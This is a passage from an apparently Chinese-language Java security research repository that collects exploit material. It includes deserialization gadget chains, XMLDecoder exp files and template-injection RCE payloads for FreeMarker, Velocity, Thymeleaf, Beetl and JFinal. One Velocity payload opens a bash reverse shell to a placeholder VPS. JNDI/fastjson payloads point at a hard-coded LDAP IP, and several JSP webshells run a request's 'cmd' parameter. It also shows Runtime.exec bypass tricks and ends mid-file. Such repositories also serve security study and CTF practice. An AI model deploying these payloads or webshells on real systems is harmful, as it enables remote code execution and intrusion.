String.CASE_INSENSITIVE_ORDER); 15 | final PriorityQueue queue = new PriorityQueue(2, comparator); 16 | queue.add("1"); 17 | queue.add("1"); 18 | SerializeUtil.setFieldValue(comparator, "property", "outputProperties"); 19 | SerializeUtil.setFieldValue(queue, "queue", new Object[]{tmpl, tmpl}); 20 | SerializeUtil.writeObjectToFile(queue, fileName); 21 | SerializeUtil.readFileObject(fileName); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /java序列化链/FileUpload/FileUploadForCopy.java: -------------------------------------------------------------------------------- 1 | package FileUpload; 2 | 3 | /** 4 | * author:Firebasky 5 | */ 6 | 7 | import Tools.SerializeUtil; 8 | import org.apache.commons.fileupload.disk.DiskFileItem; 9 | import org.apache.commons.io.output.DeferredFileOutputStream; 10 | import java.io.File; 11 | import java.lang.reflect.Field; 12 | 13 | public class FileUploadForCopy { 14 | public static String fileName = "FileUploadForCopy.bin"; 15 | public static void main(String[] args)throws Exception { 16 | File src = new File("d:/flag.txt"); 17 | File target = new File("d:/bbb"); 18 | DeferredFileOutputStream dfos = new DeferredFileOutputStream(-1, src); 19 | //写入 大于阈值 写入硬盘 20 | DiskFileItem diskFileItem = new DiskFileItem(null, null, false, null, 0, target); 21 | Field dfosFile = DiskFileItem.class.getDeclaredField("dfos"); 22 | dfosFile.setAccessible(true); 23 | dfosFile.set(diskFileItem, dfos); 24 | SerializeUtil.writeObjectToFile(diskFileItem, fileName); 25 | SerializeUtil.readFileObject(fileName); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /java序列化链/Java反序列化入门之URLDNS链.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java序列化链/Java反序列化入门之URLDNS链.pdf -------------------------------------------------------------------------------- /java序列化链/Mojarra/Readme.md: -------------------------------------------------------------------------------- 1 | # Mojarra 2 | 3 | https://www.synacktiv.com/publications/finding-gadgets-like-its-2015-part-2.html 4 | 5 | https://github.com/synacktiv/mojarragadget 6 | 7 | https://mvnrepository.com/artifact/org.glassfish/javax.faces 8 | 9 | tw上的新链 10 | 11 | ``` 12 | TiedMapEntry.toString() 13 | TiedMapEntry.getValue() 14 | SingletonMap.get() 15 | SingletonMap.isEqualKey() 16 | ValueExpressionValueBindingAdapter.equals() 17 | IndexedValueExpression.getType() 18 | ValueExpressionImpl.getValue() 19 | ``` 20 | 21 | ![gadgets](https://user-images.githubusercontent.com/63966847/139520715-04f1b40c-b2d4-4702-bc48-572da16254d3.jpg) 22 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/Readme.md: -------------------------------------------------------------------------------- 1 | # XMLDecoder反序列化漏洞底层 2 | 3 | 参考的文章已经分析的非常详细了,这里我主要是就是一下最后的执行是怎么样的。 4 | 5 | ```java 6 | import java.beans.Expression; 7 | public class test { 8 | public static void main(String[] args)throws Exception { 9 | String[] strings = new String[]{"cmd.exe","/c","calc"}; 10 | Object var3 = new ProcessBuilder(strings); 11 | String var4 = "start"; 12 | Object[] var2 = new Object[]{}; 13 | Expression var5 = new Expression(var3, var4, var2); 14 | var5.getValue(); 15 | } 16 | } 17 | ``` 18 | 19 | 并且通过测试可以发现Expression的使用,给出下面的例子。 20 | 21 | ```java 22 | public class cmd { 23 | public void Noparameter(){ 24 | System.out.println("无参数调用...."); 25 | } 26 | public void Parameter(Object[] obj){ 27 | System.out.println("有参数调用...."); 28 | } 29 | } 30 | ``` 31 | 32 | ```java 33 | import java.beans.Expression; 34 | 35 | public class test1 { 36 | public static void main(String[] args)throws Exception { 37 | Object var3 = new cmd(); 38 | String var4 = "Parameter";//Noparameter 39 | Object[] var2 = new Object[]{"233333"}; 40 | var2 = new Object[]{var2}; 41 | var2 = new Object[]{}; 42 | Expression var5 = new Expression(var3, var4, var2); 43 | var5.getValue(); 44 | } 45 | } 46 | ``` 47 | 48 | 并且给出了一些exp. 49 | 50 | [exp1](./exp1.xml) 51 | 52 | [exp2](./exp2.xml) **通过实体编码绕过** 53 | 54 | [exp3](./exp3.xml) 55 | 56 | >参考 57 | > 58 | >https://www.freebuf.com/articles/network/247331.html 59 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/exp1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | cmd.exe 7 | 8 | 9 | /c 10 | 11 | 12 | calc 13 | 14 | 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/exp2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | cmd.exe 7 | 8 | 9 | /c 10 | 11 | 12 | calc 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/exp3.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | D:\shell.jsp 5 | 6 | 7 | 1234567890 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/main.java: -------------------------------------------------------------------------------- 1 | import java.beans.XMLDecoder; 2 | import java.io.BufferedInputStream; 3 | import java.io.FileInputStream; 4 | 5 | public class main { 6 | public static void main(String[] args) throws Exception{ 7 | XMLDecoder xmlDecoder = new XMLDecoder(new BufferedInputStream(new FileInputStream("XMLEXP.xml"))); 8 | xmlDecoder.readObject(); 9 | xmlDecoder.close(); 10 | } 11 | } -------------------------------------------------------------------------------- /java日常/Thinking_in_java高级之volatile.md: -------------------------------------------------------------------------------- 1 | https://muxiaobai.github.io/2019/10/12/Thinking-in-java-%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile/ 2 | -------------------------------------------------------------------------------- /java日常/img/image-20210818111820181.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/image-20210818111820181.png -------------------------------------------------------------------------------- /java日常/img/jep290.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/jep290.png -------------------------------------------------------------------------------- /java日常/img/readobject.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/readobject.jpg -------------------------------------------------------------------------------- /java日常/img/xxe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/xxe.png -------------------------------------------------------------------------------- /java日常/img/反射.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/反射.png -------------------------------------------------------------------------------- /java日常/javabean与内省.md: -------------------------------------------------------------------------------- 1 | https://www.cnblogs.com/uu5666/p/8601983.html 2 | 简单的说安全问题就是可以调用set和get方法 3 | 参考 CB 链 4 | -------------------------------------------------------------------------------- /java日常/java写文件rce.md: -------------------------------------------------------------------------------- 1 | 2 | ## 如果Java项目存在写文件操作怎么rce? 3 | ### 1.普通的Java web项目 4 | 直接写jsp木马 (如果能解析 5 | 6 | ### 2.如果不能解析jsp 7 | 通过写class文件让其触发某一个方法然后重写该方法rce。也就是把恶意类写入classpath( target/classes),再通过某种方式加载、使用该恶意类,触发该恶意类的static代码块或执行该恶意类的某个方法,来实现通用的RCE利用。重点关注class.formane 8 | 可以参考2021国赛的ezj4va 就是通过重写readobject方法去触发rce。 9 | 或者可以参考d3ctf中的no rce题中也是写入target/classes中实现静态方法。然后通过jdbc去初始化恶意类触发。 10 | 11 | ### 3.如果项目是jar打包启动的 12 | 面前自己遇到的是springboot项目 通过覆盖charset.jar去hook实现rce。大概原理就是jvm启动的过程中不会全部加载资源如charset.jar是不会加载的只有通过特点方法才会加载。这样可以减少Java内存的消耗。 13 | 参考 文章springboot写文件rce 14 | 15 | ### springboot 16 | 17 | https://landgrey.me/blog/22/ 18 | 19 | https://threedr3am.github.io/2021/04/14/JDK8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%9C%BA%E6%99%AF%E4%B8%8B%E7%9A%84SpringBoot%20RCE/ 20 | 21 | ### fastjson 22 | https://threedr3am.github.io/2021/04/13/JDK8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%9C%BA%E6%99%AF%E4%B8%8B%E7%9A%84Fastjson%20RCE/ 23 | 24 | > 25 | https://www.cnblogs.com/wh4am1/p/14681335.html 26 | 27 | https://mp.weixin.qq.com/s?__biz=MzI3MzUwMTQwNg==&mid=2247485312&idx=1&sn=22dddceccf679f34705d987181a328db&token=1393640502&lang=zh_CN&scene=21#wechat_redirect 28 | -------------------------------------------------------------------------------- /java日常/java协议.md: -------------------------------------------------------------------------------- 1 | ## java协议 2 | JAVA默认提供了对file,ftp,gopher,http,https,jar,mailto,netdoc协议的支持。 3 | 4 | ### file(ssrf、xxe): 5 | file:///etc/passwd 6 | 7 | ### netdoc(ssrf、xxe): 8 | 知道文件名和文件路径,很简单我们只要知道文件路径然后利用我们的 netdoc 去列目录就能知道文件名了 9 | netdoc:///var/www/html/ 10 | 不常见 11 | 12 | >ps:过滤了file、gopher可使用netdoc代替 13 | 14 | ### jar(ssrf、xxe): 15 | jar:http://localhost:9999/jar.zip!/1.php 16 | 17 | ### http(ssrf、xxe): 18 | http://url/file.ext 19 | http://example.com/evil.xml 20 | 21 | ### gopher(ssrf、xxe): 22 | gopher://ip:port/xxx 23 | 24 | >监听:nc -vv -l -p port 25 | -------------------------------------------------------------------------------- /java日常/java执行js导致命令执行.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/java执行js导致命令执行.pdf -------------------------------------------------------------------------------- /java日常/marshalsec.md: -------------------------------------------------------------------------------- 1 | # marshalsec使用 2 | 3 | ``` 4 | java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] 5 | ``` 6 | 7 | 参数说明: 8 | 9 | - -a:生成exploit下的所有payload 10 | - -t:对生成的payloads进行解码测试 11 | - -v:verbose mode, 展示生成的payloads 12 | - gadget_type:指定使用的payload 13 | - arguments: payload运行时使用的参数 14 | - marshalsec.:指定exploits,根目录下的java文件名 15 | -------------------------------------------------------------------------------- /java日常/readobject深入.md: -------------------------------------------------------------------------------- 1 | ## 流程: 2 | 3 | ![](./img/readobject.jpg) 4 | ObjectInputSteram.readObject() 5 | 6 | readObject0() 7 | 8 | readOrdinaryObject() 9 | 10 | desc = readClassDesc(false) 11 | 12 | descriptor = readNonProxyDesc(unshared) 13 | 14 | readDesc = readClassDescriptor() 15 | 16 | cl = resolveClass(readDesc) 17 | 18 | filterCheck(cl, -1) 19 | 20 | desc.initNonProxy(readDesc, cl, resolveEx, readClassDesc(false)) 21 | 各種初始化、檢查 suid 等 22 | 23 | return desc 24 | 25 | return descriptor 26 | 27 | obj = desc.isInstantiable() ? desc.newInstance() : null 28 | 29 | readSerialData(obj, desc) 30 | 31 | slotDesc.invokeReadObject(obj, this) 32 | 33 | readObjectMethod.invoke(obj, new Object[]{ in }) 34 | -------------------------------------------------------------------------------- /java日常/yso搭建.md: -------------------------------------------------------------------------------- 1 | 参考: 2 | 3 | https://www.guildhab.top/2020/07/java-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E5-%E8%A7%A3%E5%AF%86-ysoserial-java%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86%E6%9C%BA%E5%88%B6/ 4 | -------------------------------------------------------------------------------- /java模板注入/Beetl/exp.txt: -------------------------------------------------------------------------------- 1 | http://ibeetl.com/beetlonline/ 2 | 3 | https://landgrey.me/blog/17/ 4 | 5 | JfinalCMS: https://xz.aliyun.com/t/8695 6 | 7 | ```java 8 | ${@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",@java.lang.Class.forName("java.lang.String")).invoke(@java.lang.Class.forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null),"ping 029bzv.dnslog.cn")} 9 | 10 | 11 | ``` 12 | -------------------------------------------------------------------------------- /java模板注入/FreeMarker/exp.txt: -------------------------------------------------------------------------------- 1 | https://www.cnblogs.com/Eleven-Liu/p/12747908.html 2 | 3 | freemarker.template.utility#Execute 4 | <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")} 5 | 6 | freemarker.template.utility#ObjectConstructor 7 | <#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()} 8 | 9 | freemarker.template.utility#JythonRuntime 10 | <#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe") 11 | 12 | bypass 13 | https://github.com/proudwind/javasec_study/blob/master/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-ssti.md 14 | https://paper.seebug.org/1304/ 15 | -------------------------------------------------------------------------------- /java模板注入/Thymeleaf/exp.txt: -------------------------------------------------------------------------------- 1 | https://paper.seebug.org/1332/ 2 | 3 | exp: 4 | 3.0.12 Thymeleaf RCE Bypass 5 | ${T (java.lang.Runtime).getRuntime().exec("whoami")} 6 | 7 | -------------------------------------------------------------------------------- /java模板注入/Velocity/exp.txt: -------------------------------------------------------------------------------- 1 | $bizBean.class.class.forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec("/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/VPS-IP/VPS-PORT<&1") 2 | 3 | 4 | #set($e="e") 5 | ${e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")} 6 | 7 | -------------------------------------------------------------------------------- /java模板注入/Velocity/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | org.apache.velocity 4 | velocity 5 | 1.7 6 | 7 | 8 | org.apache.velocity 9 | velocity-tools 10 | 2.0 11 | 12 | -------------------------------------------------------------------------------- /java模板注入/exp.txt: -------------------------------------------------------------------------------- 1 | https://p1n93r.github.io/post/code_audit/jfinal_enjoy_template_engine%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/ 2 | 3 | https://www.bookstack.cn/read/jfinal-4.8/09006a00d50c23b5.md 4 | 5 | 6 | #include("../log/jfinal-blog.log") 7 | 8 | #set(script_e=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager"))#set(script_j=script_e.getEngineByName("js"))#set(exp="new java.io.BufferedWriter(new java.io.FileWriter('C:\\Users\\ctf\\jfinal-blog\\jfinal-blog\\webapp\\upload\\image\\2.txt::$DATA'));out.write(java.net.URLDecoder.decode('1231321231'));out.close();")#(script_j.eval(exp)) 9 | 10 | 11 | 12 | #set(script_e=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager"))#set(script_j=script_e.getEngineByName("js"))#set(exp="java.lang.Runtime.getRuntime().exec('ping kmvqho.dnslog.cn')")#(script_j.eval(exp)) 13 | 14 | java.lang.Runtime.getRuntime().exec('ping kmvqho.dnslog.cn') 15 | 16 | 17 | #((com.mysql.jdbc.Util::handleNewInstance(((java.net.URLClassLoader::getSystemClassLoader()).loadClass("javax.script.ScriptEngineManager").getDeclaredConstructor()),null,null)).getEngineByExtension("js").eval("java.lang.Runtime.getRuntime().exec('ping kmvqho.dnslog.cn')")) 18 | -------------------------------------------------------------------------------- /java模板注入/jsp/test.jsp: -------------------------------------------------------------------------------- 1 | <% 2 | out.println(22222); 3 | %> 4 | ${Runtime.getRuntime().exec("calc")} 5 | -------------------------------------------------------------------------------- /java面向对象练习一.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java面向对象练习一.pdf -------------------------------------------------------------------------------- /jndi-gadgets.md: -------------------------------------------------------------------------------- 1 | ``` 2 | {"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"} 3 | 4 | {"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]} 5 | 6 | InputStream in = new FileInputStream("C3P0.ser"); 7 | byte[] data = toByteArray(in); 8 | in.close(); 9 | String HexString = bytesToHexString(data, data.length); 10 | String poc = "{\"object\":[\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",{\"userOverridesAsString\":\"HexAsciiSerializedMap:"+ HexString + ";\"}]}"; 11 | System.out.println(poc); 12 | 13 | public static byte[] toByteArray(InputStream in) throws IOException { 14 | byte[] classBytes; 15 | classBytes = new byte[in.available()]; 16 | in.read(classBytes); 17 | in.close(); 18 | return classBytes; 19 | } 20 | 21 | public static String bytesToHexString(byte[] bArray, int length) { 22 | StringBuffer sb = new StringBuffer(length); 23 | for(int i = 0; i < length; ++i) { 24 | String sTemp = Integer.toHexString(255 & bArray[i]); 25 | if (sTemp.length() < 2) { 26 | sb.append(0); 27 | } 28 | 29 | sb.append(sTemp.toUpperCase()); 30 | } 31 | return sb.toString(); 32 | } 33 | ``` 34 | -------------------------------------------------------------------------------- /shell/EL/test.java: -------------------------------------------------------------------------------- 1 | package shell.EL; 2 | 3 | import javax.el.ELProcessor; 4 | 5 | public class test { 6 | public static void main(String[] args) throws Exception { 7 | String payload = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"var exp='calc';java.lang.Runtime.getRuntime().exec(exp);\")"; 8 | 9 | String poc = "''.getClass().forName('javax.script.ScriptEngineManager')" + 10 | ".newInstance().getEngineByName('nashorn')" + 11 | ".eval(\"s=[3];s[0]='cmd.exe';s[1]='/c';s[2]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; 12 | 13 | ELeval(payload); 14 | } 15 | 16 | public static void ELeval(String payload){ 17 | ELProcessor elProcessor = new ELProcessor(); 18 | try { 19 | elProcessor.eval(payload); 20 | } catch (Exception e) { 21 | e.printStackTrace(); 22 | } 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /shell/Elasticsearch_MVEL/demo.java: -------------------------------------------------------------------------------- 1 | String exp = "a=123;new java.lang.ProcessBuilder("calc").start();"; 2 | Map vars = new HashMap(); 3 | vars.put("foobar", new Integer(100)); 4 | String result = MVEL.eval(exp, vars).toString(); 5 | -------------------------------------------------------------------------------- /shell/Elasticsearch_MVEL/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | org.mvel 3 | mvel2 4 | 2.2.8.Final 5 | 6 | -------------------------------------------------------------------------------- /shell/Expression/test.java: -------------------------------------------------------------------------------- 1 | package shell.Expression; 2 | 3 | import java.beans.Expression; 4 | 5 | public class test { 6 | public static void main(String[] args) { 7 | String payload ="calc"; 8 | Expression expression = new Expression(Runtime.getRuntime(),"\u0065"+"\u0078"+"\u0065"+"\u0063",new Object[]{payload}); 9 | try { 10 | expression.getValue(); 11 | } catch (Exception e) { 12 | e.printStackTrace(); 13 | } 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /shell/Expression/test.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.beans.Expression"%> 2 | <%@ page contentType="text/html; charset=UTF-8" language="java" %> 3 | <% 4 | String payload =request.getParameter("cmd"); 5 | Expression expression = new Expression(Runtime.getRuntime(),"\u0065"+"\u0078"+"\u0065"+"\u0063",new Object[]{payload}); 6 | %> -------------------------------------------------------------------------------- /shell/JNDI/test.java: -------------------------------------------------------------------------------- 1 | package shell.JNDI; 2 | 3 | import com.sun.rowset.JdbcRowSetImpl; 4 | 5 | public class test { 6 | public static void main(String[] args) { 7 | String payload = "ldap://1.116.136.120:8888/test";//可使用LdapBypassJndi工具 8 | // String payload = "ldap://127.0.0.1:1399/test"; 9 | try { 10 | Jndieval(payload); 11 | } catch (Exception e) { 12 | e.printStackTrace(); 13 | } 14 | } 15 | public static void Jndieval(String payload) throws Exception{ 16 | // System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");//绕过jdk191+ 17 | JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); 18 | jdbcRowSet.setDataSourceName(payload);//设置exp,通过getDataSourceName获得 19 | jdbcRowSet.setAutoCommit(true);//调用connect() 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /shell/JNI/CommandExecution.java: -------------------------------------------------------------------------------- 1 | package shell.JNI; 2 | 3 | public class CommandExecution { 4 | 5 | // public static native String exec(String cmd); 6 | 7 | public static void main(String[] args) { 8 | System.setProperty("java.library.path","D:/library"); 9 | System.out.println(System.getProperty("java.library.path")); 10 | } 11 | } -------------------------------------------------------------------------------- /shell/JNI/test.jsp: -------------------------------------------------------------------------------- 1 | <%@ page contentType="text/html; charset=UTF-8" language="java" %> 2 | <%! class Jni{ 3 | static { 4 | System.loadLibrary("\\\\127.0.0.1\\cmd.dll"); 5 | } 6 | public native String exec(String cmd); 7 | } 8 | %><% 9 | String cmd =request.getParameter("cmd"); 10 | Jni jni = new Jni(); 11 | String res = jni.exec(cmd); 12 | out.println(res); 13 | %> -------------------------------------------------------------------------------- /shell/Jexl/demo.java: -------------------------------------------------------------------------------- 1 | JexlContext jc = new MapContext(); 2 | Expression e = new JexlEngine().createExpression("''.class.forName('java.lang.Runtime').getRuntime().exec("calc")"); 3 | Object result = e.evaluate(jc); 4 | System.out.println(result); 5 | -------------------------------------------------------------------------------- /shell/Jexl/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | org.apache.commons 3 | commons-jexl 4 | 2.1.1 5 | 6 | -------------------------------------------------------------------------------- /shell/Jshell/test.java: -------------------------------------------------------------------------------- 1 | //package shell.Jshell; 2 | //import jdk.jshell.JShell; 3 | // 4 | //public class test { 5 | // public static void main(String[] args) { 6 | // Jshell("calc"); 7 | // } 8 | // public static void Jshell(String cmd){ 9 | // try { 10 | // JShell.builder().build().eval(cmd); 11 | // } catch (IllegalStateException e) { 12 | // e.printStackTrace(); 13 | // } 14 | // } 15 | //} 16 | -------------------------------------------------------------------------------- /shell/OGNL/demo.java: -------------------------------------------------------------------------------- 1 | OgnlContext context = new OgnlContext(); 2 | Object execResult = Ognl.getValue("@java.lang.Runtime@getRuntime().exec('calc')", null); 3 | System.out.println(execResult); 4 | -------------------------------------------------------------------------------- /shell/OGNL/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | ognl 3 | ognl 4 | 3.0.1 5 | 6 | -------------------------------------------------------------------------------- /shell/Readme.md: -------------------------------------------------------------------------------- 1 | # shell 2 | 3 | 偶然发现了一篇文章 4 | >https://xz.aliyun.com/t/7798 5 | 6 | 7 | + [一种新型Java一句话木马的实现](https://xz.aliyun.com/t/9715) 8 | 9 | ## 命令执行的tips 10 | 11 | https://www.anquanke.com/post/id/243329 12 | 13 | https://xz.aliyun.com/t/7046 14 | 15 | **其实说到底是java.lang.Runtime#exec(string)一个对命令进行了空格切分(导致切分不合本意),另一个string[]是自己去分离可以执行** 16 | 17 | 下面代码是可以执行的 18 | 19 | /cmd?command=;curl http://ip:port 20 | 21 | ```java 22 | @GetMapping(value = "/cmd") 23 | public void cmd(@RequestParam String command) throws Exception { 24 | String[] c = { "/bin/bash","-c", "hacker "+ command };///bin/bash -c hacker;ls 25 | Process p = Runtime.getRuntime().exec(c); 26 | } 27 | ``` 28 | 29 | 下面是不能执行的 30 | ```java 31 | Command = "ping 127.0.0.1"+request.getParameter("cmd"); 32 | Runtime.getRuntime().exec(command); 33 | ``` 34 | -------------------------------------------------------------------------------- /shell/ScriptEngineManager/java-scripting-programmers-guide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/shell/ScriptEngineManager/java-scripting-programmers-guide.pdf -------------------------------------------------------------------------------- /shell/ScriptEngineManager/shell.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,javax.script.*"%> 2 | <% 3 | ScriptEngineManager scriptEngineManager = new ScriptEngineManager(); 4 | BufferedReader object = (BufferedReader)scriptEngineManager.getEngineByName("JavaScript").eval("new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cmd.exe /c "+request.getParameter("cmd")+"").getInputStream()))"); 5 | 6 | String line = ""; 7 | String result = ""; 8 | while((line=object.readLine())!=null) 9 | { 10 | result = result + line; 11 | } 12 | out.println(result); 13 | %> 14 | -------------------------------------------------------------------------------- /shell/ScriptEngineManager/shell2.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,javax.script.*"%> 2 | <% 3 | ScriptEngineManager manager = new ScriptEngineManager(); 4 | ScriptEngine engine = manager.getEngineByName("JavaScript"); 5 | 6 | Compilable compEngine = (Compilable) engine; 7 | CompiledScript script = compEngine.compile("new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cmd.exe /c dir").getInputStream()))"); 8 | BufferedReader object = (BufferedReader)script.eval(); 9 | 10 | String line = ""; 11 | String result = ""; 12 | while((line=object.readLine())!=null) 13 | { 14 | result = result + line; 15 | } 16 | out.println(result); 17 | %> 18 | -------------------------------------------------------------------------------- /shell/bypass/servertableentry.java: -------------------------------------------------------------------------------- 1 | package shell.bypass; 2 | 3 | import com.sun.corba.se.impl.logging.ActivationSystemException; 4 | import com.sun.corba.se.spi.activation.RepositoryPackage.ServerDef; 5 | import java.lang.reflect.Constructor; 6 | import java.lang.reflect.Field; 7 | import java.lang.reflect.Method; 8 | import java.util.logging.Logger; 9 | 10 | public class servertableentry { 11 | public static void main(String[] args) throws Exception{ 12 | Class C = Class.forName("com.sun.corba.se.impl.activation.ServerTableEntry"); 13 | Constructor declaredConstructor = C.getDeclaredConstructor(ActivationSystemException.class, int.class, ServerDef.class, int.class ,String.class , boolean.class, boolean.class ); 14 | declaredConstructor.setAccessible(true); 15 | Class l = Class.forName("java.util.logging.Logger"); 16 | Constructor declaredConstructor1 = l.getDeclaredConstructor(String.class); 17 | declaredConstructor1.setAccessible(true); 18 | Logger o1 = (Logger)declaredConstructor1.newInstance("Firebasky"); 19 | ActivationSystemException activationSystemException = new ActivationSystemException(o1); 20 | ServerDef serverDef = new ServerDef(null,null,"C:\\",null,null); 21 | Object o = declaredConstructor.newInstance(activationSystemException, 0, serverDef, 0, "", false, false); 22 | Field activationCmd = C.getDeclaredField("activationCmd"); 23 | activationCmd.setAccessible(true); 24 | activationCmd.set(o,"calc"); 25 | Method verify = C.getMethod("verify"); 26 | verify.invoke(o); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /shell/bypass/test.java: -------------------------------------------------------------------------------- 1 | package shell.bypass; 2 | 3 | import java.io.BufferedReader; 4 | import java.io.InputStreamReader; 5 | import java.lang.reflect.Method; 6 | import java.util.Map; 7 | 8 | public class test { 9 | public static void main(String[] args) { 10 | try { 11 | bypass(new String[]{"ipconfig"}); 12 | } catch (Exception e) { 13 | e.printStackTrace(); 14 | } 15 | } 16 | public static void bypass(String[] cmd) throws Exception{ 17 | Map envblock=null; 18 | String path=null; 19 | ProcessBuilder.Redirect[] stdHandles=null; 20 | boolean redirectErrorStream=true; 21 | 22 | Class C = Class.forName("java.lang.ProcessImpl"); 23 | Method start = C.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class); 24 | start.setAccessible(true); 25 | Process e = (Process) start.invoke(null, cmd, envblock, path, stdHandles, redirectErrorStream); 26 | 27 | BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(e.getInputStream())); 28 | String line; 29 | while ((line=bufferedReader.readLine())!=null){ 30 | System.out.println(line); 31 | } 32 | bufferedReader.close(); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /shell/bypass/test2.java: -------------------------------------------------------------------------------- 1 | package shell.bypass; 2 | 3 | import java.beans.Statement; 4 | 5 | public class test2 { 6 | public static void main(String[] args) { 7 | String payload ="calc"; 8 | Statement statement = new Statement(Runtime.getRuntime(), "\u0065" + "\u0078" + "\u0065" + "\u0063", new Object[]{payload}); 9 | try { 10 | statement.execute(); 11 | } catch (Exception e) { 12 | e.printStackTrace(); 13 | } 14 | } 15 | } 16 | 17 | -------------------------------------------------------------------------------- /shell/bypass/test4.java: -------------------------------------------------------------------------------- 1 | package shell.bypass; 2 | 3 | 4 | import sun.net.www.MimeEntry; 5 | 6 | import java.io.InputStream; 7 | import java.lang.reflect.Constructor; 8 | import java.lang.reflect.Field; 9 | import java.net.URL; 10 | import java.net.URLConnection; 11 | 12 | public class test4 { 13 | public static void main(String[] args)throws Exception { 14 | bypass("notepad"); 15 | } 16 | public static void bypass(String cmd) throws Exception{ 17 | Class aClass = Class.forName("sun.net.www.MimeEntry"); 18 | Constructor d = aClass.getDeclaredConstructor(String.class,int.class,String.class,String.class); 19 | d.setAccessible(true); 20 | MimeEntry obj =(MimeEntry) d.newInstance("Firebasky", 1314, "C:\\windows\\win.ini", "%s"); 21 | 22 | URL url = new URL("http://127.0.0.1:8000"); 23 | URLConnection urlConnection = url.openConnection(); 24 | InputStream inputStream = urlConnection.getInputStream(); 25 | 26 | Class C = Class.forName("sun.net.www.MimeLauncher"); 27 | Constructor declaredConstructor = C.getDeclaredConstructor(MimeEntry.class, URLConnection.class, InputStream.class, String.class, String.class); 28 | declaredConstructor.setAccessible(true);; 29 | Thread o = (Thread)declaredConstructor.newInstance(obj,urlConnection, inputStream, "", ""); 30 | Field execPath = C.getDeclaredField("execPath"); 31 | 